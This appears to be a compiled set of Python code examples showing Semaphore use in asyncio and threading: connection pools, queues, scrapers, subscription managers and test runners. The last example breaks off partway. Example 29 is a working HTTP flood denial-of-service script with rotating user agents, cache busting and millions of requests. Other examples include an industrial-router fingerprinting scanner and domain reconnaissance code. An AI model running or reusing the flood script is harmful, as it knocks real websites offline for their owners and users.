class Collector(CompileStateListener):
        """
        Collect all state updates, optionally hang the processing of listeners
        """
        def __init__(self):
            self.seen = []
            self.preseen = []
            self.lock = Semaphore(1)

        def reset(self):
            self.seen = []
            self.preseen = []

        async def compile_done(self, compile: data.Compile):
            self.preseen.append(compile)
            print("Got compile done for ", compile.remote_id)
            async with self.lock:
                self.seen.append(compile)

        async def hang(self):
            await self.lock.acquire()

        def release(self):
            self.lock.release()

        def verify(self, envs: Sequence[uuid.UUID]):
            assert sorted([x.remote_id for x in self.seen]) == sorted(envs)
            self.reset()
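
A minimal usage sketch (an assumption, not part of the original test): hang() parks listener processing at the lock, release() lets the queued updates drain, and verify() checks what was seen. FakeCompile stands in for data.Compile.

import asyncio

class FakeCompile:  # stand-in for data.Compile, an assumption
    def __init__(self, remote_id):
        self.remote_id = remote_id

async def demo():
    collector = Collector()
    await collector.hang()  # compile_done will now block on the lock
    tasks = [asyncio.create_task(collector.compile_done(FakeCompile(i)))
             for i in range(3)]
    await asyncio.sleep(0)  # let each task run up to the lock
    assert len(collector.preseen) == 3 and not collector.seen
    collector.release()  # unblock; the tasks finish one by one
    await asyncio.gather(*tasks)
    collector.verify([0, 1, 2])

asyncio.run(demo())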
Example 2
    def __init__(self, pubnub_instance):
        subscription_manager = self

        self._message_worker = None
        self._message_queue = Queue()
        self._subscription_lock = Semaphore(1)
        self._subscribe_loop_task = None
        self._heartbeat_periodic_callback = None
        self._reconnection_manager = AsyncioReconnectionManager(pubnub_instance)

        super(AsyncioSubscriptionManager, self).__init__(pubnub_instance)
        self._start_worker()

        class AsyncioReconnectionCallback(ReconnectionCallback):
            def on_reconnect(self):
                subscription_manager.reconnect()

                pn_status = PNStatus()
                pn_status.category = PNStatusCategory.PNReconnectedCategory
                pn_status.error = False

                subscription_manager._subscription_status_announced = True
                subscription_manager._listener_manager.announce_status(pn_status)

        self._reconnection_listener = AsyncioReconnectionCallback()
        self._reconnection_manager.set_reconnection_listener(self._reconnection_listener)
Example 3
 def __init__(self, worker_q, ws, map_jobs, n_reducer=30, url=""):
     '''
     worker_q: priority queue into which available workers are put.
     ws: a websocket connection object.
     map_jobs: a list storing all map tasks
     (more precisely: which part of the input file each covers)
     n_reducer: number of reducers.
     '''
     super(scheduler, self).__init__()
     self.url_list = []
     self.url = url
     self.mutex = Semaphore()
     self.map_jobs = map_jobs
     self.n_reducer = n_reducer
     self.stoprequest = threading.Event()
     self.worker_q = worker_q
     self.ws = ws
     self.dead_worker = set()
     self.mapCount = 0
     self.reduceCount = n_reducer
     # a dict used to track the status of all map/reduce jobs:
     # entries of map_jobs are the keys; the value is a list of
     # workers (if not finished) or None (if finished)
     self.map_status = {}
     self.reduce_status = {}
     self.tid_map = {}
     for job in map_jobs:
         self.map_status[job] = []
     for i in range(n_reducer):
         self.reduce_status[i] = []
Example 4
    def __init__(self, connector, pool_size, connection_cls):
        self.pool_size = pool_size
        self.pool = set()
        self.sem = Semaphore(pool_size)

        for _ in range(pool_size):
            self.pool.add(connection_cls(connector))
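
The semaphore caps concurrent checkouts at pool_size. A sketch of the acquire/release pair such a pool would typically expose (these method names are assumptions, not shown in the original):

    async def acquire(self):
        # Wait until a connection is free, then check one out.
        await self.sem.acquire()
        return self.pool.pop()

    def release(self, connection):
        # Check the connection back in and wake one waiter.
        self.pool.add(connection)
        self.sem.release()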
Example 5
 def __init__(self, n_slots):
     self._n_slots = n_slots
     self._wait_tx = OrderedDict()
     self._wait_tx_sem = Semaphore(0)
     self._wait_rx = OrderedDict()
     self._not_full = Event()
     self._not_full.set()
Example 6
 def __init__(self, opener, address, max_size=1, max_age=None):
     self._opener = opener
     self._address = address
     self._max_size = max_size
     self._max_age = max_age
     self._in_use_list = deque()
     self._free_list = deque()
     self._slots = Semaphore(self._max_size)
Example 7
 def __init__(self, pubnub_instance):
     self._message_worker = None
     self._message_queue = Queue()
     self._subscription_lock = Semaphore(1)
     self._subscribe_loop_task = None
     self._heartbeat_periodic_callback = None
     super(AsyncioSubscriptionManager, self).__init__(pubnub_instance)
     self._start_worker()
Example 8
async def worker(xs: List[int], pred: Callable[[int], bool],
                 res: List[List[int]], semaphore: asyncio.Semaphore) -> None:
    for x in xs:
        await semaphore.acquire()
        if pred(x):
            res[0].append(x)
        semaphore.release()
        await asyncio.sleep(0.000000001)
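
A hedged driver for the worker above: one shared semaphore bounds how many predicate checks are in flight across both workers (the bound and inputs are arbitrary):

import asyncio
from typing import List

async def main() -> None:
    xs = list(range(10))
    res: List[List[int]] = [[]]
    semaphore = asyncio.Semaphore(2)  # at most 2 checks at a time
    await asyncio.gather(
        worker(xs[:5], lambda x: x % 2 == 0, res, semaphore),
        worker(xs[5:], lambda x: x % 2 == 0, res, semaphore))
    print(res[0])  # the even numbers, in interleaved order

asyncio.run(main())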
Example 9
 def __init__(self):
     self.barreira = Barreira(4)  # Ensures 4 students will be on the boat
     self.mutex = Lock()  # Protects access to the ufcg and uepb variables
     self.ufcg = 0  # Number of UFCG students waiting
     self.uepb = 0  # Number of UEPB students waiting
     self.embarque_ufcg = Semaphore(0)  # Signals that a UFCG student may board the boat
     self.embarque_uepb = Semaphore(0)  # Signals that a UEPB student may board the boat
Example 10
 def __init__(self,
              wordle_instance: Wordle,
              group: Union[Group, int],
              member: Optional[Union[Member, int]] = None):
     self.wordle = wordle_instance
     self.group = group if isinstance(group, int) else group.id
     self.member = (member if isinstance(member, int) else
                    member.id) if member else None
     self.member_list = set()
     self.member_list_mutex = Semaphore(1)
Example 11
async def get_some_dress(semaphore: Semaphore):
    await semaphore.acquire()  # take a fitting room; the free-room counter drops by 1
    start = time.time()
    await main_task()
    time_of_work = time.time() - start
    print("WORK TIME:", time_of_work)
    await asyncio.sleep(1 - time_of_work)
    semaphore.release()  # free the fitting room; the free-room counter rises by 1
Example 12
 def __init__(self, assembler: PayloadStreamAssembler):
     self._assembler = assembler
     self._buffer_queue: List[List[int]] = []
     self._lock = Lock()
     self._data_available = Semaphore(0)
     self._producer_length = 0  # total length
     self._consumer_position = 0  # read position
     self._active: List[int] = []
     self._active_offset = 0
     self._end = False
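
Here Semaphore(0) acts as a data-available signal. A sketch of the producer/consumer pair it is presumably matched with elsewhere in the class (method names are assumptions):

 def write(self, chunk: List[int]) -> None:
     # Producer side: enqueue under the lock, then signal one reader.
     with self._lock:
         self._buffer_queue.append(chunk)
         self._producer_length += len(chunk)
     self._data_available.release()

 def _wait_for_data(self) -> None:
     # Consumer side: block until at least one chunk has been produced.
     self._data_available.acquire()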
Example 13
 def __init__(self, loop=None):
     logger.info('Worker initialising...')
     loop = loop or asyncio.get_event_loop()
     self.loop = loop
     logger.debug('Connecting to db: "%s"', DB_DSN)
     self._pool = loop.run_until_complete(create_pool(dsn=DB_DSN, loop=loop, minsize=2, maxsize=10))
     self.wkh2p_sema = Semaphore(value=MAX_WORKER_THREADS, loop=loop)
     self.worker_sema = Semaphore(value=MAX_WORKER_JOBS, loop=loop)
     self.redis = None
     self.exc_info = None
Example 14
 def __init__(self, addr, configuration, maxconnections):
     self._addr = addr
     self._configuration = configuration
     if not maxconnections:
         raise Exception('Please set a maximum limit of connections in the pool')
     self._limit = Semaphore(maxconnections)
     self._available = deque()
     self._inuse = set()
     self._fast = None
     self._lock = Lock()
Example 15
async def analyze(cli_args: argparse.Namespace, domain: str,
                  recursion_level: int, results_queue: asyncio.Queue,
                  sem: asyncio.Semaphore, input_domains_queue: asyncio.Queue):

    tasks = []
    try:
        #
        # Getting info from AWS
        #
        t1 = asyncio.create_task(
            get_s3(cli_args, domain, recursion_level, input_domains_queue,
                   results_queue))

        tasks.append(t1)

    except Exception as e:
        print(e)

    try:
        #
        # Get web links?
        #
        if not cli_args.no_links:
            t2 = asyncio.create_task(
                get_links(cli_args, domain, recursion_level,
                          input_domains_queue, results_queue))

            tasks.append(t2)

    except Exception as e:
        print(e)

    try:
        #
        # Get cnames
        #
        # if cli_args.dns:
        if not cli_args.no_dnsdiscover:
            t3 = asyncio.create_task(
                get_dns_info(cli_args, domain, recursion_level,
                             input_domains_queue))

            tasks.append(t3)

    except Exception as e:
        print(e)

    try:
        await asyncio.gather(*tasks)
    finally:
        sem.release()
        input_domains_queue.task_done()
Example 16
class Barreira:
    def __init__(self, n):
        self.n = n  # Number of threads to wait for
        self.contador = 0  # Number of threads arrived so far
        self.barreira_1 = Semaphore(0)  # Guards entry to the barrier
        self.barreira_2 = Semaphore(1)  # Guards exit from the barrier
        self.mutex = Lock()  # Protects access to the contador variable

    async def acquire_1(self):
        '''Wait at the barrier entrance.'''
        async with self.mutex:
            self.contador += 1
            if self.contador == self.n:
                await self.barreira_2.acquire()
                self.barreira_1.release()

        await self.barreira_1.acquire()
        self.barreira_1.release()

    async def acquire_2(self):
        '''Wait at the barrier exit.'''
        async with self.mutex:
            self.contador -= 1
            if self.contador == 0:
                await self.barreira_1.acquire()
                self.barreira_2.release()

        await self.barreira_2.acquire()
        self.barreira_2.release()
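
A self-contained sketch of four tasks crossing this reusable two-phase barrier together (the passenger coroutine is an assumption; Lock and Semaphore are taken to be the asyncio primitives):

import asyncio

async def passageiro(barreira: Barreira, i: int):
    await barreira.acquire_1()  # phase 1: wait until all 4 have arrived
    print(f"passenger {i} is on the boat")
    await barreira.acquire_2()  # phase 2: wait until all 4 have left

async def main():
    barreira = Barreira(4)
    await asyncio.gather(*(passageiro(barreira, i) for i in range(4)))

asyncio.run(main())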
Example 17
class FifoQueue:
    def __init__(self):
        self._queue = deque()
        self._semaphore = Semaphore(0)

    def __len__(self):
        return len(self._queue)

    async def push(self, request):
        self._queue.append(request)
        self._semaphore.release()

    async def pop(self):
        await self._semaphore.acquire()
        return self._queue.popleft()
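
A brief usage sketch: pop() blocks on the semaphore until a push() makes an item available (assuming asyncio primitives):

import asyncio

async def demo():
    q = FifoQueue()
    consumer = asyncio.create_task(q.pop())  # blocks: the counter is 0
    await q.push("request-1")  # release() wakes the consumer
    print(await consumer)  # -> "request-1"

asyncio.run(demo())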
Example 18
async def frequency_limiter(sem: Semaphore) -> None:
    """
    Function that must be used only inside router module
    to wait some time before answer to the client and let the background task to start

    :param sem: semaphore to store iot or user data
    """
    try:
        await wait_for(sem.acquire(), 1)
        sem.release()

    except TimeoutError:
        raise HTTPException(
            status_code=status.HTTP_503_SERVICE_UNAVAILABLE,
            headers={"Retry-After": str(randrange(1, 29) * random() + 1)},
        )
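
A hedged sketch of a call site: the route grabs the gate before scheduling its background work, and the client gets the 503 with Retry-After when the gate stays busy for over a second (the router, semaphore, and handler below are assumptions):

from asyncio import Semaphore
from fastapi import APIRouter, BackgroundTasks

router = APIRouter()
iot_semaphore = Semaphore(1)  # assumed per-resource gate

def process_iot(payload: dict) -> None:  # assumed handler, stubbed for the sketch
    print("processing", payload)

@router.post("/iot")
async def receive_iot_data(payload: dict, background_tasks: BackgroundTasks):
    await frequency_limiter(iot_semaphore)  # may raise the 503 above
    background_tasks.add_task(process_iot, payload)
    return {"status": "accepted"}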
Example 19
    def __init__(self, args: argparse.Namespace):
        self.timeout = args.timeout
        self.use_mpi = args.version.startswith("p")
        default_ompthreads = 2 if "smp" in args.version else 1
        self.ompthreads = args.ompthreads if args.ompthreads else default_ompthreads
        self.mpiranks = args.mpiranks if self.use_mpi else 1
        self.num_workers = int(args.maxtasks / self.ompthreads / self.mpiranks)
        self.workers = Semaphore(self.num_workers)
        self.cp2k_root = Path(__file__).resolve().parent.parent.parent
        self.mpiexec = args.mpiexec.split()
        self.keepalive = args.keepalive
        self.arch = args.arch
        self.version = args.version
        self.debug = args.debug
        self.max_errors = args.maxerrors
        self.restrictdirs = args.restrictdir if args.restrictdir else [".*"]
        datestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
        leaf_dir = f"TEST-{args.arch}-{args.version}-{datestamp}"
        self.work_base_dir = (args.workbasedir / leaf_dir if args.workbasedir
                              else self.cp2k_root / "regtesting" / leaf_dir)
        self.error_summary = self.work_base_dir / "error_summary"

        def run_with_capture_stdout(cmd: str) -> bytes:
            # capture_output argument not available before Python 3.7
            return subprocess.run(cmd, shell=True, stdout=PIPE,
                                  stderr=DEVNULL).stdout

        # Detect number of GPU devices.
        nv_cmd = "nvidia-smi --query-gpu=gpu_name --format=csv,noheader | wc -l"
        nv_gpus = int(run_with_capture_stdout(nv_cmd))
        amd_cmd = "rocm-smi --showid --csv | grep card | wc -l"
        amd_gpus = int(run_with_capture_stdout(amd_cmd))
        self.num_gpus = nv_gpus + amd_gpus
        self.next_gpu = 0  # Used to assign devices round robin to processes.
Example 20
class PriorityQueue:
    def __init__(self):
        self._queue = []
        self._semaphore = Semaphore(0)

    def __len__(self):
        return len(self._queue)

    async def push(self, request):
        heappush(self._queue, _PriorityQueueItem(request))
        self._semaphore.release()

    async def pop(self):
        await self._semaphore.acquire()
        item = heappop(self._queue)
        return item.request
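
_PriorityQueueItem is not shown above; a plausible minimal version (an assumption, including the priority attribute) that makes requests orderable for heappush/heappop:

from functools import total_ordering

@total_ordering
class _PriorityQueueItem:
    def __init__(self, request):
        self.request = request

    def __eq__(self, other):
        return self.request.priority == other.request.priority

    def __lt__(self, other):
        # Lower numbers pop first, matching heapq's min-heap order.
        return self.request.priority < other.request.priority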
Example 21
 def __init__(self, args: argparse.Namespace):
     self.timeout = args.timeout
     self.use_mpi = args.version.startswith("p")
     self.ompthreads = args.ompthreads
     self.mpiranks = args.mpiranks if self.use_mpi else 1
     self.num_workers = int(args.maxtasks / self.ompthreads / self.mpiranks)
     self.workers = Semaphore(self.num_workers)
     self.cp2k_root = Path(__file__).resolve().parent.parent.parent
     datestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
     leaf_dir = f"TEST-{args.arch}-{args.version}-{datestamp}"
     self.work_base_dir = self.cp2k_root / "regtesting" / leaf_dir
     self.error_summary = self.work_base_dir / "error_summary"
     self.keep_alive = args.keep_alive
     self.arch = args.arch
     self.version = args.version
     self.debug = args.debug
     self.max_errors = args.maxerrors
     self.restrictdirs = args.restrictdir if args.restrictdir else [".*"]
     nv_cmd = "nvidia-smi --query-gpu=gpu_name --format=csv,noheader | wc -l"
     nv_gpus = int(
         subprocess.run(nv_cmd, shell=True, capture_output=True).stdout)
     amd_cmd = "rocm-smi --showid --csv | grep card | wc -l"
     amd_gpus = int(
         subprocess.run(amd_cmd, shell=True, capture_output=True).stdout)
     self.num_gpus = nv_gpus + amd_gpus
     self.next_gpu = 0  # Used to assign devices round robin to processes.
Example 22
    async def check_is_router(
        cls, address: str, port: int,
        semaphore=Semaphore()) -> BaseIndustrialRouter:
        """
        Check if a certain router is an industrial router, given the headers defined at class level.

        :param address: IP address of the router to check.
        :param port: Port of the web interface of the device to check.
        :param semaphore: Asyncio semaphore to be used for concurrency limitation.
        :return: A :class:`aztarna.industrialrouters.scanner.BaseIndustrialRouter` object if the checked device is a router.
                None otherwise.
        """
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        context.options &= ~ssl.OP_NO_SSLv3
        async with semaphore:
            async with aiohttp.ClientSession(
                    timeout=ClientTimeout(2)) as client:
                uri = 'http://{}:{}'.format(address, port)
                print('[+] Connecting to {}'.format(address))
                async with client.get(uri, ssl=context) as response:
                    for field, values in cls.possible_headers:
                        if response.headers.get(field) in values:
                            router = cls.router_cls()
                            router.address = address
                            router.port = port
                            return router
                    # No header matched: not an industrial router.
                    return None
Example 23
async def scrape(url_list):
    sem = Semaphore(semaphore)

    async with ClientSession() as session:
        return await gather(
            *[ensure_future(scrape_one(url, sem, session)) for url in url_list])
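
scrape_one is not shown; a hedged sketch of the throttling it presumably performs, entering the semaphore around each request so at most `semaphore` fetches run at once:

async def scrape_one(url, sem, session):
    async with sem:  # cap the number of concurrent requests
        async with session.get(url) as response:
            return await response.text()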
Example 24
async def fetch_with_sem(counter=0):
    header = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) '
                            'Chrome/86.0.4240.111 Safari/537.36'}

    sem = Semaphore(10)
    async with sem:
        async with ClientSession() as session:
            for url in list_of_urls:
                url = f'{url}{"/commits"}'
                async with session.get(url, headers=header) as response:
                    html_body = await response.read()
                    soup = BeautifulSoup(html_body, 'html.parser')
                content = soup.find_all('div', class_='flex-auto min-width-0')

                for data in content:
                    title = (data.find('div', class_='f6 text-gray min-width-0').
                             find('a', class_='commit-author user-mention').get_text().strip()
                             if data.find('a', class_='commit-author user-mention') else None)

                    message = (data.find('a', class_='link-gray-dark').get_text()
                               if data.find('a', class_='link-gray-dark') else None)

                    timestamp = (data.find('relative-time', class_='no-wrap').get_text()
                                 if data.find('relative-time', class_='no-wrap') else None)

                    counter += 1

                    df = {
                        'title': title,
                        'message': message,
                        'timestamp': timestamp,
                    }

                    commitframe.append(df)
                print(f'Total commits saved: {counter}')
Example 25
async def fetcher(database):
    """Fetch all the feeds"""

    # disable certificate validation to cope with self-signed certificates in some feed back-ends
    client = ClientSession(connector=TCPConnector(verify_ssl=False))
    sem = Semaphore(MAX_CONCURRENT_REQUESTS)

    queue = await connect_redis()
    while True:
        log.info("Beginning run.")
        tasks = []
        threshold = datetime.now() - timedelta(seconds=FETCH_INTERVAL)
        async with ClientSession() as session:
            while True:
                try:
                    job = await dequeue(queue, 'fetcher')
                    feed = await database.feeds.find_one({'_id': job['_id']})
                    last_fetched = feed.get('last_fetched', threshold)
                    if last_fetched <= threshold:
                        task = ensure_future(
                            throttle(sem, session, feed, client, database,
                                     queue))
                        tasks.append(task)
                except Exception:
                    log.error(format_exc())
                    break
            responses = gather(*tasks)
            await responses
            log.info("Run complete, sleeping %ds...", CHECK_INTERVAL)
            await sleep(CHECK_INTERVAL)
    queue.close()
    await queue.wait_closed()
Example 26
async def perform_request(conn: Optional[aiohttp.TCPConnector], i: int,
                          sem: asyncio.Semaphore, url: str):
    t0 = time.time()
    try:
        async with aiohttp.request('get', url, connector=conn) as resp:
            # Read the whole response without buffering it.
            chunk = True
            while chunk:
                chunk = await resp.content.read(1024 * 1024)

            delta = time.time() - t0
            LOG.info("[%d] HTTP %d after %s seconds", i, resp.status, delta)
    except aiohttp.client_exceptions.ClientConnectorError as e:
        LOG.info("[%d] %s", i, e)
    finally:
        sem.release()
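
perform_request only releases the semaphore, so the caller is expected to acquire before scheduling each task. A hedged driver (names and limits are assumptions; conn=None lets aiohttp pick a default connector):

import asyncio

async def main(url: str, total: int = 100, limit: int = 10) -> None:
    sem = asyncio.Semaphore(limit)
    tasks = []
    for i in range(total):
        await sem.acquire()  # blocks once `limit` requests are in flight
        tasks.append(asyncio.create_task(perform_request(None, i, sem, url)))
    await asyncio.gather(*tasks)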
Example 27
    async def interval_task(self):
        try:
            to_backup = self.bot.db.intervals.find(
                {"next": {
                    "$lt": datetime.utcnow()
                }})
            semaphore = Semaphore(10)
            async for interval in to_backup:

                async def run_interval(interval=interval):  # bind the loop variable
                    try:
                        next = datetime.utcnow() + timedelta(
                            minutes=interval["interval"])
                        await self.bot.db.intervals.update_one(
                            {"_id": interval["_id"]}, {"$set": {
                                "next": next
                            }})
                        await self.run_backup(interval["_id"])
                    finally:
                        semaphore.release()

                await semaphore.acquire()
                self.bot.loop.create_task(run_interval())
                await sleep(0)

        except Exception:
            pass
Example 28
 def __init__(self, manager):
     self.log = get_logger('overseer')
     self.workers = []
     self.manager = manager
     self.things_count = deque(maxlen=9)
     self.paused = False
     self.coroutines_count = 0
     self.skipped = 0
     self.visits = 0
     self.coroutine_semaphore = Semaphore(conf.COROUTINES_LIMIT, loop=LOOP)
     self.redundant = 0
     self.running = True
     self.all_seen = False
     self.idle_seconds = 0
     self.log.info('Overseer initialized')
     self.pokemon_found = ''
Example 29
async def Direct(session):
    url = Options.url
    header = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;',
        'Cache-Control': 'public, max-age=0',
        'Content-Encoding': 'deflate',
        'Connection': 'keep-alive',
        'Via': '1.1 Chrome-Compression-Proxy',
        'Host': Options.host
    }
    tasks = []
    sem = Semaphore(Options.threads)

    async def _call(i):
        try:
            header.update({
                "User-Agent": choice(Options.ua)
            })
            async with session.get(url=url + Functions.Cache(), allow_redirects=False, ssl=False, headers=header) as response:
                if i % 1000 == 0:
                    Functions.Success("Target: {} | Thread: {} | Status: {}".format(url, i, response.status))
        except Exception:
            pass
        finally:
            sem.release()  # always release, or failed requests would starve the acquire loop

    for i in range(1, 10000000):
        await sem.acquire()
        task = ensure_future(_call(i))
        task.add_done_callback(tasks.remove)
        tasks.append(task)

    await wait(tasks)
    Functions.Success("Attack complete 10m of requests")
Example 30
File: main.py Project: messa/ow2
async def async_main(conf):
    async with AsyncExitStack() as stack:
        session = await stack.enter_async_context(ClientSession())
        stop_event = Event()
        get_running_loop().add_signal_handler(SIGINT, stop_event.set)
        get_running_loop().add_signal_handler(SIGTERM, stop_event.set)
        send_report_semaphore = Semaphore(2)
        check_tasks = []
        try:
            # create asyncio task for each configured check target
            for target in conf.targets:
                check_tasks.append(
                    create_task(
                        check_target(session, conf, target,
                                     send_report_semaphore)))
                await sleep(.1)
            # all set up and (hopefully) running
            done, pending = await wait(check_tasks + [stop_event.wait()],
                                       return_when=FIRST_COMPLETED)
            if not stop_event.is_set():
                raise Exception(
                    f'Some task(s) unexpectedly finished: {done!r}')
        finally:
            logger.debug('Cleanup...')
            for t in check_tasks:
                t.cancel()
Example 31
async def feed_fetcher(database):
    """Fetch all the feeds"""

    client = ClientSession(auth=BasicAuth(API_KEY))
    sem = Semaphore(MAX_CONCURRENT_REQUESTS)

    queue = await connect_redis()
    while True:
        log.info("Beginning run.")
        tasks = []
        async with client as session:
            while True:
                try:
                    job = await dequeue(queue, 'fetcher')
                    feed = await database.feeds.find_one(
                        {'advert_id': job['_id']})
                    task = ensure_future(
                        throttle(sem, session, feed, client, database, queue))
                    tasks.append(task)
                except Exception:
                    log.error(format_exc())
                    break
            responses = gather(*tasks)
            await responses
            log.info("Run complete, sleeping %ds...", CHECK_INTERVAL)
            await sleep(CHECK_INTERVAL)
    queue.close()
    await queue.wait_closed()
Example 32
async def hello(x: int, sem: asyncio.Semaphore):
    r = random.randint(1, 5)

    async for key in redis.iscan(match='something*'):
        print('Matched:', key)

    print("Waiting {}".format(x))
    await asyncio.sleep(r)
    print("Finish: " + str(x))

    print("Waiting {}".format(x))
    await asyncio.sleep(r)
    print("Finish: " + str(x))

    print("Waiting {}".format(x))
    await asyncio.sleep(r)
    print("Finish: " + str(x))

    f = asyncio.Future()

    sem.release()
Example 33
class AsyncioSubscriptionManager(SubscriptionManager):
    def __init__(self, pubnub_instance):
        subscription_manager = self

        self._message_worker = None
        self._message_queue = Queue()
        self._subscription_lock = Semaphore(1)
        self._subscribe_loop_task = None
        self._heartbeat_periodic_callback = None
        self._reconnection_manager = AsyncioReconnectionManager(pubnub_instance)

        super(AsyncioSubscriptionManager, self).__init__(pubnub_instance)
        self._start_worker()

        class AsyncioReconnectionCallback(ReconnectionCallback):
            def on_reconnect(self):
                subscription_manager.reconnect()

                pn_status = PNStatus()
                pn_status.category = PNStatusCategory.PNReconnectedCategory
                pn_status.error = False

                subscription_manager._subscription_status_announced = True
                subscription_manager._listener_manager.announce_status(pn_status)

        self._reconnection_listener = AsyncioReconnectionCallback()
        self._reconnection_manager.set_reconnection_listener(self._reconnection_listener)

    def _set_consumer_event(self):
        if not self._message_worker.cancelled():
            self._message_worker.cancel()

    def _message_queue_put(self, message):
        self._message_queue.put_nowait(message)

    def _start_worker(self):
        consumer = AsyncioSubscribeMessageWorker(self._pubnub,
                                                 self._listener_manager,
                                                 self._message_queue, None)
        self._message_worker = asyncio.ensure_future(consumer.run(),
                                                     loop=self._pubnub.event_loop)

    def reconnect(self):
        # TODO: method is synchronized in Java
        self._should_stop = False
        self._subscribe_loop_task = asyncio.ensure_future(self._start_subscribe_loop())
        self._register_heartbeat_timer()

    def disconnect(self):
        # TODO: method is synchronized in Java
        self._should_stop = True
        self._stop_heartbeat_timer()
        self._stop_subscribe_loop()

    def stop(self):
        super(AsyncioSubscriptionManager, self).stop()
        self._reconnection_manager.stop_polling()
        if self._subscribe_loop_task is not None and not self._subscribe_loop_task.cancelled():
            self._subscribe_loop_task.cancel()

    @asyncio.coroutine
    def _start_subscribe_loop(self):
        self._stop_subscribe_loop()

        yield from self._subscription_lock.acquire()

        combined_channels = self._subscription_state.prepare_channel_list(True)
        combined_groups = self._subscription_state.prepare_channel_group_list(True)

        if len(combined_channels) == 0 and len(combined_groups) == 0:
            self._subscription_lock.release()
            return

        self._subscribe_request_task = asyncio.ensure_future(Subscribe(self._pubnub)
                                                             .channels(combined_channels)
                                                             .channel_groups(combined_groups)
                                                             .timetoken(self._timetoken).region(self._region)
                                                             .filter_expression(self._pubnub.config.filter_expression)
                                                             .future())

        e = yield from self._subscribe_request_task

        if self._subscribe_request_task.cancelled():
            self._subscription_lock.release()
            return

        if e.is_error():
            if e.status is not None and e.status.category == PNStatusCategory.PNCancelledCategory:
                self._subscription_lock.release()
                return

            if e.status is not None and e.status.category == PNStatusCategory.PNTimeoutCategory:
                self._pubnub.event_loop.call_soon(self._start_subscribe_loop)
                self._subscription_lock.release()
                return

            logger.error("Exception in subscribe loop: %s" % str(e))

            if e.status is not None and e.status.category == PNStatusCategory.PNAccessDeniedCategory:
                e.status.operation = PNOperationType.PNUnsubscribeOperation

            # TODO: raise error
            self._listener_manager.announce_status(e.status)

            self._reconnection_manager.start_polling()
            self._subscription_lock.release()
            self.disconnect()
            return
        else:
            self._handle_endpoint_call(e.result, e.status)
            self._subscription_lock.release()
            self._subscribe_loop_task = asyncio.ensure_future(self._start_subscribe_loop())

    def _stop_subscribe_loop(self):
        if self._subscribe_request_task is not None and not self._subscribe_request_task.cancelled():
            self._subscribe_request_task.cancel()

    def _stop_heartbeat_timer(self):
        if self._heartbeat_periodic_callback is not None:
            self._heartbeat_periodic_callback.stop()

    def _register_heartbeat_timer(self):
        super(AsyncioSubscriptionManager, self)._register_heartbeat_timer()

        self._heartbeat_periodic_callback = AsyncioPeriodicCallback(
            self._perform_heartbeat_loop,
            self._pubnub.config.heartbeat_interval * 1000,
            self._pubnub.event_loop)
        if not self._should_stop:
            self._heartbeat_periodic_callback.start()

    @asyncio.coroutine
    def _perform_heartbeat_loop(self):
        if self._heartbeat_call is not None:
            # TODO: cancel call
            pass

        cancellation_event = Event()
        state_payload = self._subscription_state.state_payload()
        presence_channels = self._subscription_state.prepare_channel_list(False)
        presence_groups = self._subscription_state.prepare_channel_group_list(False)

        if len(presence_channels) == 0 and len(presence_groups) == 0:
            return

        try:
            heartbeat_call = (Heartbeat(self._pubnub)
                              .channels(presence_channels)
                              .channel_groups(presence_groups)
                              .state(state_payload)
                              .cancellation_event(cancellation_event)
                              .future())

            envelope = yield from heartbeat_call

            heartbeat_verbosity = self._pubnub.config.heartbeat_notification_options
            if envelope.status.is_error:
                if heartbeat_verbosity == PNHeartbeatNotificationOptions.ALL or \
                        heartbeat_verbosity == PNHeartbeatNotificationOptions.FAILURES:
                    self._listener_manager.announce_status(envelope.status)
            else:
                if heartbeat_verbosity == PNHeartbeatNotificationOptions.ALL:
                    self._listener_manager.announce_status(envelope.status)

        except PubNubAsyncioException as e:
            pass
            # TODO: check correctness
            # if e.status is not None and e.status.category == PNStatusCategory.PNTimeoutCategory:
            #     self._start_subscribe_loop()
            # else:
            #     self._listener_manager.announce_status(e.status)
        finally:
            cancellation_event.set()

    def _send_leave(self, unsubscribe_operation):
        asyncio.ensure_future(self._send_leave_helper(unsubscribe_operation))

    @asyncio.coroutine
    def _send_leave_helper(self, unsubscribe_operation):
        envelope = yield from Leave(self._pubnub) \
            .channels(unsubscribe_operation.channels) \
            .channel_groups(unsubscribe_operation.channel_groups).future()

        self._listener_manager.announce_status(envelope.status)
Example 34
class Overseer:
    def __init__(self, manager):
        self.log = get_logger('overseer')
        self.workers = []
        self.manager = manager
        self.things_count = deque(maxlen=9)
        self.paused = False
        self.coroutines_count = 0
        self.skipped = 0
        self.visits = 0
        self.coroutine_semaphore = Semaphore(conf.COROUTINES_LIMIT, loop=LOOP)
        self.redundant = 0
        self.running = True
        self.all_seen = False
        self.idle_seconds = 0
        self.log.info('Overseer initialized')
        self.pokemon_found = ''

    def start(self, status_bar):
        self.captcha_queue = self.manager.captcha_queue()
        Worker.captcha_queue = self.manager.captcha_queue()
        self.extra_queue = self.manager.extra_queue()
        Worker.extra_queue = self.manager.extra_queue()
        if conf.MAP_WORKERS:
            Worker.worker_dict = self.manager.worker_dict()

        for username, account in ACCOUNTS.items():
            account['username'] = username
            if account.get('banned'):
                continue
            if account.get('captcha'):
                self.captcha_queue.put(account)
            else:
                self.extra_queue.put(account)

        self.workers = tuple(Worker(worker_no=x) for x in range(conf.GRID[0] * conf.GRID[1]))
        db_proc.start()
        LOOP.call_later(10, self.update_count)
        LOOP.call_later(max(conf.SWAP_OLDEST, conf.MINIMUM_RUNTIME), self.swap_oldest)
        LOOP.call_soon(self.update_stats)
        if status_bar:
            LOOP.call_soon(self.print_status)

    def update_count(self):
        self.things_count.append(str(db_proc.count))
        self.pokemon_found = (
            'Pokemon found count (10s interval):\n'
            + ' '.join(self.things_count)
            + '\n')
        LOOP.call_later(10, self.update_count)

    def swap_oldest(self, interval=conf.SWAP_OLDEST, minimum=conf.MINIMUM_RUNTIME):
        if not self.paused and not self.extra_queue.empty():
            oldest, minutes = self.longest_running()
            if minutes > minimum:
                LOOP.create_task(oldest.lock_and_swap(minutes))
        LOOP.call_later(interval, self.swap_oldest)

    def print_status(self, refresh=conf.REFRESH_RATE):
        try:
            self._print_status()
        except CancelledError:
            return
        except Exception as e:
